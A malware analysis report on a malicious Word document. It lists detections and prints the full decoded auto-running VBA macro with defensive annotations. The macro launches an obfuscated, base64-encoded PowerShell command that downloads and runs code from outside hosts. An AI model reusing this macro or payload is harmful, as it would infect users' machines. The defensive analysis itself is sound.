Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a4e95e9c610f89c9…

MALICIOUS

Office (OLE)

Size: 85.0 KB · Created: 2018-04-19 18:59:00 · Authoring application: Microsoft Office Word · First seen: 2019-05-31
MD5: 53f8658eea6dca641cbe982c210b4602 SHA-1: c0ba6769954fefa7040dfd6ce70c540ed06ef21d SHA-256: a4e95e9c610f89c9ac646a8b0330babf0cc3854ac310e1786c1777c2c8fb9ff7
290 Risk Score

Heuristics 9

  • ClamAV: Doc.Malware.00536d-6723914-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.00536d-6723914-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
      Call IsError(VBA.Interaction.Shell(Trim(Join(Array(diaIwiLETuLylvikOWuvaNYMAnIGacY, zwugaWESuxOxuWyNOzoLARIfOjIDoiOSAPaTLez, taJIkucAgoZAziNiaUSOLINatAV, cOciCaLVAgabeLUhqopikOGEVuDsUFY), "")), (25 - (100 / (2 * 2)))))
  • cmd.exe reference in VBA high OLE_VBA_CMD
    cmd.exe reference in VBA
    Matched line in script
    On Error Resume Next
    diaIwiLETuLylvikOWuvaNYMAnIGacY = "cmd.exe /c P^" + Format(ChrW((35 * 2) + (10 - 1))) + "^W^e^r^s^" + Format(ChrW(2 + (35 * 2))) + "^e^l^L^.^E^X^e^ ^-^E^C^ ^K^A^B^" + Format(ChrW((35 * 2) + (10 - 1))) + "^A^G^U^A^d^w^A^t^A^E^8^A^Y^g^B^q^A^G^U^A^Y^w^B^0^A^C^A^A^U^w^B^5^A^" + Format(ChrW(2 + (35 * 2))) + "^M^A^d^A^B^l^A^G^0^A^L^g^B^" + Format(ChrW((35 * 2) + (10 - 1))) + "^A^G^U^A^d^A^A^u^A^F^c^A^Z^Q^B^i^A^E^M^A^b^A^B^p^A^G^U^A^b^g^B^0^A^C^k^A^L^g^B^E^A^G^8^A^d^w^B^u^A^G^w^A^b^w^B^h^A^G^Q^A^R^g^B^ …
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This heuristic catches p-code-only macro documents, or documents whose source extraction failed, where no visible macro source is available.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Const BeTOsunUQOCHEZYRibJitOpEpigK = 0
    Sub AutoOpen()
    On Error Resume Next
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the legacy Word macro execution surface; by itself it does not attribute the sample to a downloader or to a parser CVE.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for the channel (macro, JS, link annotation, document body, ...) through which each URL was reached.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliography In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXml In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7541 bytes
SHA-256: 0ab3d5163d7b0d7bf84849aabdf6a8914ce17b75b088c3c5c23d76caf2fb327b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Analyst annotation: module header of the ThisDocument class module as decoded
' by olevba. No "Option Explicit" appears in the extracted source, so the
' undeclared names used by the filler blocks below are implicitly created as
' Variants at first use.
' This constant is not referenced anywhere in the extracted source.
Const BeTOsunUQOCHEZYRibJitOpEpigK = 0
' Analyst annotation (defender's view): auto-execution entry point. AutoOpen
' runs when the document is opened with macros enabled and is the marker behind
' the OLE_VBA_AUTOOPEN finding. The routine only assembles four string fragments
' and hands them to DUjEMezUfIZvUjcUNOBOiIJuHA, which performs the Shell call;
' everything else in the body is filler with no observable effect.
Sub AutoOpen()
' Suppress every runtime error so the filler statements cannot abort the
' routine before the hand-off at the end.
On Error Resume Next
' Fragment 1 of the command line. The two ChrW() expressions evaluate to
' (35*2)+(10-1) = 79 ("O") and 2+(35*2) = 72 ("H"); the "^" characters are
' cmd.exe escape characters that are dropped when cmd parses the line, so the
' fragment reads as a caret-obfuscated "cmd.exe /c PoWersHelL.EXe -EC ..."
' launch. The "-EC" token followed by base64-looking text suggests an
' encoded-command PowerShell invocation; the encoded payload is not decoded here.
diaIwiLETuLylvikOWuvaNYMAnIGacY = "cmd.exe /c P^" + Format(ChrW((35 * 2) + (10 - 1))) + "^W^e^r^s^" + Format(ChrW(2 + (35 * 2))) + "^e^l^L^.^E^X^e^ ^-^E^C^ ^K^A^B^" + Format(ChrW((35 * 2) + (10 - 1))) + "^A^G^U^A^d^w^A^t^A^E^8^A^Y^g^B^q^A^G^U^A^Y^w^B^0^A^C^A^A^U^w^B^5^A^" + Format(ChrW(2 + (35 * 2))) + "^M^A^d^A^B^l^A^G^0^A^L^g^B^" + Format(ChrW((35 * 2) + (10 - 1))) + "^A^G^U^A^d^A^A^u^A^F^c^A^Z^Q^B^i^A^E^M^A^b^A^B^p^A^G^U^A^b^g^B^0^A^C^k^A^L^g^B^E^A^G^8^A^d^w^B^u^A^G^w^A^b^w^B^h^A^G^Q^A^R^g^B^p^A^G^w^A^Z^Q^A^o^A^C^I^A^a^A^B^0^A^" + Format(ChrW(2 + (35 * 2))) + "^Q^A^c^A^A^6^A^C^8^A^L^w^B^k^A^G^U^A^c^g^B^3^A^G^E^A^Z^w^B^p^A^G^U^A^d^A^B^l^A^C^4^A^Y^w^B^v^A^G^0^A^L^w^B^S^A^F^U^A^S^Q^A^v^A^G^w^A^Z^Q^B^2^A^G^8^A^b^g^B^k^A^C^4^A^c^A^B^o^A^" + Format(ChrW(2 + (35 * 2))) + "^A"

' Fragment 2 of the command line, built with the same caret/ChrW scheme.
zwugaWESuxOxuWyNOzoLARIfOjIDoiOSAPaTLez = "^A^P^w^B^s^A^D^0^A^Z^w^B^v^A^G^s^A^c^w^A^0^A^C^4^A^e^A^B^h^A^" + Format(ChrW(2 + (35 * 2))) + "^A^A^I^g^A^s^A^C^A^A^J^A^B^l^A^G^4^A^d^g^A^6^A^E^E^A^U^A^B^Q^A^E^Q^A^Q^Q^B^U^A^E^E^A^I^A^A^r^A^C^A^A^J^w^B^c^A^G^U^A^Y^Q^B^h^A^D^M^A^" + Format(ChrW((35 * 2) + (10 - 1))) + "^Q^B^j^A^D^c^A^N^g^A^u^A^G^U^A^e^A^B^l^A^C^c^A^K^Q^A^7^A^C^A^A^U^w^B^0^A^G^E^A^c^g^B^0^A^C^0^A^U^A^B^y^A^G^8^A^Y^w^B^l^A^" + Format(ChrW(2 + (35 * 2))) + "^M^A^c^w^A^g^A^C^Q^A^Z^Q^B^u^A^" + Format(ChrW(2 + (35 * 2))) + "^Y^A^" + Format(ChrW((35 * 2) + (10 - 1))) + "^g^B^B^A^F^A^A^U^A^B^E^A^E^E^A^V^A^B^B^A^C^c^A^X^A^B^l^A^G^E^A^Y^Q^A^z^A^D^k^A^Y^w^A^3^A^D^Y^A^L^g^B^l^A^" + Format(ChrW(2 + (35 * 2))) + "^g^A^Z^Q^A^n^A^D^s^A^I^A^A^g^A^E"


' Filler block. IsError(Choose(...)) and IsError CVErr(...) have no side
' effects. The If test applies IsNull to a name that is never assigned; with no
' Option Explicit it is an Empty Variant, IsNull(Empty) is False, and the
' assignment inside never runs. Presumably padding to defeat signature matching.
Dim aABEsihyROKYtulJApyrosiNIGazEcibC

aABEsihyROKYtulJApyrosiNIGazEcibC = IsError(Choose(10, "SiaTafyrocYmmYty", "SiaTafyrocYmmYty", "aABEsihyROKYtulJApyrosiNIGazEcibC"))
IsError CVErr(3335)

If IsNull(aABEsihyROKYtulJApyrosiNIGazEcibC_SiaTafyrocYmmYty) And IsError(CVErr(10)) Then
   SiaTafyrocYmmYty_aABEsihyROKYtulJApyrosiNIGazEcibC = CStr("-3335") + UCase("SiaTafyrocYmmYty")
End If


' Filler block (same pattern as above).
Dim CYQACIBUGupuPisopetQyiaUlUGya

CYQACIBUGupuPisopetQyiaUlUGya = IsError(Choose(9, "iIRexowiCXegyDUgo", "iIRexowiCXegyDUgo", "CYQACIBUGupuPisopetQyiaUlUGya"))
IsError CVErr(1749)

If IsNull(CYQACIBUGupuPisopetQyiaUlUGya_iIRexowiCXegyDUgo) And IsError(CVErr(9)) Then
   iIRexowiCXegyDUgo_CYQACIBUGupuPisopetQyiaUlUGya = CStr("-1749") + UCase("iIRexowiCXegyDUgo")
End If


' Fragment 3 of the command line, same caret/ChrW scheme.
taJIkucAgoZAziNiaUSOLINatAV = "^k^A^R^Q^B^Y^A^C^g^A^K^A^B^" + Format(ChrW((35 * 2) + (10 - 1))) + "^A^G^U^A^d^w^A^t^A^E^8^A^Y^g^B^q^A^G^U^A^Y^w^B^0^A^C^A^A^U^w^B^5^A^" + Format(ChrW(2 + (35 * 2))) + "^M^A^d^A^B^l^A^G^0^A^L^g^B^" + Format(ChrW((35 * 2) + (10 - 1))) + "^A^G^U^A^d^A^A^u^A^F^c^A^Z^Q^B^i^A^E^M^A^b^A^B^p^A^G^U^A^b^g^B^0^A^C^k^A^L^g^B^E^A^G^8^A^d^w^B^u^A^G^w^A^b^w^B^h^A^G^Q^A^U^w^B^0^A^" + Format(ChrW(2 + (35 * 2))) + "^I^A^a^Q^B^u^A^G^c^A^K^A^A^i^A^G^g^A^d^A^B^0^A^" + Format(ChrW(2 + (35 * 2))) + "^A^A^" + Format(ChrW((35 * 2) + (10 - 1))) + "^g^A^v^A^C^8^A^N^Q^A^0^A^C^4^A^M^w^A^5^A^C^4^A^N^w^A^0^A^C^4^A^M^Q^A^y^A^D^Q^A^L^w^B^s^A^G^U^A^d^g^B^v^A^G^4^A^Z^A^A^u^A^" + Format(ChrW(2 + (35 * 2))) + "^A^A^a^A^B^w^A^C^I^A^K^Q^A^p^A^D^s^A^I^A^B^F^A^" + Format(ChrW(2 + (35 * 2))) + "^g^A^a^Q^B^0^A"

' Filler block (same pattern as above).
Dim iAZIqIaIOPUSotedYRIpIFuNufiJaHeoi

iAZIqIaIOPUSotedYRIpIFuNufiJaHeoi = IsError(Choose(4, "ROcahatAiOnuTyNeDE", "ROcahatAiOnuTyNeDE", "iAZIqIaIOPUSotedYRIpIFuNufiJaHeoi"))
IsError CVErr(3366)

If IsNull(iAZIqIaIOPUSotedYRIpIFuNufiJaHeoi_ROcahatAiOnuTyNeDE) And IsError(CVErr(4)) Then
   ROcahatAiOnuTyNeDE_iAZIqIaIOPUSotedYRIpIFuNufiJaHeoi = CStr("-3366") + UCase("ROcahatAiOnuTyNeDE")
End If



' Filler block (same pattern as above).
Dim iEluKEFeXeFUrYZEqArOiIrOfUTybUPUFyZeTi

iEluKEFeXeFUrYZEqArOiIrOfUTybUPUFyZeTi = IsError(Choose(1, "CImLufuTADdAtuGii", "CImLufuTADdAtuGii", "iEluKEFeXeFUrYZEqArOiIrOfUTybUPUFyZeTi"))
IsError CVErr(5389)

If IsNull(iEluKEFeXeFUrYZEqArOiIrOfUTybUPUFyZeTi_CImLufuTADdAtuGii) And IsError(CVErr(1)) Then
   CImLufuTADdAtuGii_iEluKEFeXeFUrYZEqArOiIrOfUTybUPUFyZeTi = CStr("-5389") + UCase("CImLufuTADdAtuGii")
End If


' Filler block (same pattern as above).
Dim niHaBcaLUXEBESydACAdSaBujUtYrAX

niHaBcaLUXEBESydACAdSaBujUtYrAX = IsError(Choose(10, "xyxKaNIxUZApocaVEgRAH", "xyxKaNIxUZApocaVEgRAH", "niHaBcaLUXEBESydACAdSaBujUtYrAX"))
IsError CVErr(8524)

If IsNull(niHaBcaLUXEBESydACAdSaBujUtYrAX_xyxKaNIxUZApocaVEgRAH) And IsError(CVErr(10)) Then
   xyxKaNIxUZApocaVEgRAH_niHaBcaLUXEBESydACAdSaBujUtYrAX = CStr("-8524") + UCase("xyxKaNIxUZApocaVEgRAH")
End If


' Fragment 4: the caret-obfuscated tail "A==", i.e. base64 padding that closes
' the encoded payload once the carets are stripped.
cOciCaLVAgabeLUhqopikOGEVuDsUFY = "^A^=^="
' Filler block (same pattern as above).
Dim iuBAxEkEHuviasYAnIboJAGuxyg

iuBAxEkEHuviasYAnIboJAGuxyg = IsError(Choose(10, "hEWEzacIFEUBOtoNOzaK", "hEWEzacIFEUBOtoNOzaK", "iuBAxEkEHuviasYAnIboJAGuxyg"))
IsError CVErr(1106)

If IsNull(iuBAxEkEHuviasYAnIboJAGuxyg_hEWEzacIFEUBOtoNOzaK) And IsError(CVErr(10)) Then
   hEWEzacIFEUBOtoNOzaK_iuBAxEkEHuviasYAnIboJAGuxyg = CStr("-1106") + UCase("hEWEzacIFEUBOtoNOzaK")
End If




' Hand-off: the four fragments go to the routine that calls Shell. The "& """
' and "+ CStr("")" wrappers are no-ops on the strings. The literal fourth
' argument "4756874682" is bound to a parameter the callee never reads.
Call DUjEMezUfIZvUjcUNOBOiIJuHA(diaIwiLETuLylvikOWuvaNYMAnIGacY & "", zwugaWESuxOxuWyNOzoLARIfOjIDoiOSAPaTLez + CStr(""), taJIkucAgoZAziNiaUSOLINatAV, "4756874682", cOciCaLVAgabeLUhqopikOGEVuDsUFY)

' Filler block (same pattern as above); runs after the hand-off.
Dim dYxeSOqYteJugEfDUmumuCYvesImENeSu

dYxeSOqYteJugEfDUmumuCYvesImENeSu = IsError(Choose(5, "cYnZilOGyaI", "cYnZilOGyaI", "dYxeSOqYteJugEfDUmumuCYvesImENeSu"))
IsError CVErr(5796)

If IsNull(dYxeSOqYteJugEfDUmumuCYvesImENeSu_cYnZilOGyaI) And IsError(CVErr(5)) Then
   cYnZilOGyaI_dYxeSOqYteJugEfDUmumuCYvesImENeSu = CStr("-5796") + UCase("cYnZilOGyaI")
End If


End Sub
' Analyst annotation (defender's view): the execution routine, called once from
' AutoOpen. It concatenates the four string fragments and passes the result to
' VBA.Interaction.Shell. Parameters 1, 2, 3 and 5 are the command-line
' fragments; parameter 4 (LAcYNYbYhAVLIFRyfIguLagEce) is never used in the body.
Sub DUjEMezUfIZvUjcUNOBOiIJuHA(diaIwiLETuLylvikOWuvaNYMAnIGacY, zwugaWESuxOxuWyNOzoLARIfOjIDoiOSAPaTLez, taJIkucAgoZAziNiaUSOLINatAV, LAcYNYbYhAVLIFRyfIguLagEce, cOciCaLVAgabeLUhqopikOGEVuDsUFY)
' Suppress runtime errors, including any raised by Shell itself.
On Error Resume Next

' Filler block: IsError/Choose/CVErr have no side effects and the If test on an
' unassigned (Empty) name is never true, so the assignment is dead.
Dim XOTYDIMoFENoNatiJIQogYraXOfeqASeRsEfIVeHY

XOTYDIMoFENoNatiJIQogYraXOfeqASeRsEfIVeHY = IsError(Choose(5, "loZaTekiaIronAVEVig", "loZaTekiaIronAVEVig", "XOTYDIMoFENoNatiJIQogYraXOfeqASeRsEfIVeHY"))
IsError CVErr(272)

If IsNull(XOTYDIMoFENoNatiJIQogYraXOfeqASeRsEfIVeHY_loZaTekiaIronAVEVig) And IsError(CVErr(5)) Then
   loZaTekiaIronAVEVig_XOTYDIMoFENoNatiJIQogYraXOfeqASeRsEfIVeHY = CStr("-272") + UCase("loZaTekiaIronAVEVig")
End If


  
  ' The Shell call behind OLE_VBA_SHELL. Join(Array(...), "") concatenates the
  ' fragments into one command line; the window-style argument
  ' (25 - (100 / (2 * 2))) evaluates to 0, i.e. vbHide, so the spawned cmd.exe
  ' has no visible window. Wrapping the call in IsError discards Shell's return
  ' value (the process id). Detection note: a Word process spawning cmd.exe,
  ' which in turn spawns PowerShell with an encoded command, is the observable
  ' process-tree behavior to alert on.
  Call IsError(VBA.Interaction.Shell(Trim(Join(Array(diaIwiLETuLylvikOWuvaNYMAnIGacY, zwugaWESuxOxuWyNOzoLARIfOjIDoiOSAPaTLez, taJIkucAgoZAziNiaUSOLINatAV, cOciCaLVAgabeLUhqopikOGEVuDsUFY), "")), (25 - (100 / (2 * 2)))))


' Filler block (same pattern as above); runs after the Shell call.
Dim TvIDikeJQiPEjYDaNesFniRATuQyroViruGAzajADUXU

TvIDikeJQiPEjYDaNesFniRATuQyroViruGAzajADUXU = IsError(Choose(7, "GYSOauJcEgum", "GYSOauJcEgum", "TvIDikeJQiPEjYDaNesFniRATuQyroViruGAzajADUXU"))
IsError CVErr(1587)

If IsNull(TvIDikeJQiPEjYDaNesFniRATuQyroViruGAzajADUXU_GYSOauJcEgum) And IsError(CVErr(7)) Then
   GYSOauJcEgum_TvIDikeJQiPEjYDaNesFniRATuQyroViruGAzajADUXU = CStr("-1587") + UCase("GYSOauJcEgum")
End If


' Filler block (same pattern as above).
Dim nUtuyzoPULULaZyJuCgivAwyPemEdIRyzUL

nUtuyzoPULULaZyJuCgivAwyPemEdIRyzUL = IsError(Choose(8, "nAVekAsulicEREmUWy", "nAVekAsulicEREmUWy", "nUtuyzoPULULaZyJuCgivAwyPemEdIRyzUL"))
IsError CVErr(9220)

If IsNull(nUtuyzoPULULaZyJuCgivAwyPemEdIRyzUL_nAVekAsulicEREmUWy) And IsError(CVErr(8)) Then
   nAVekAsulicEREmUWy_nUtuyzoPULULaZyJuCgivAwyPemEdIRyzUL = CStr("-9220") + UCase("nAVekAsulicEREmUWy")
End If



End Sub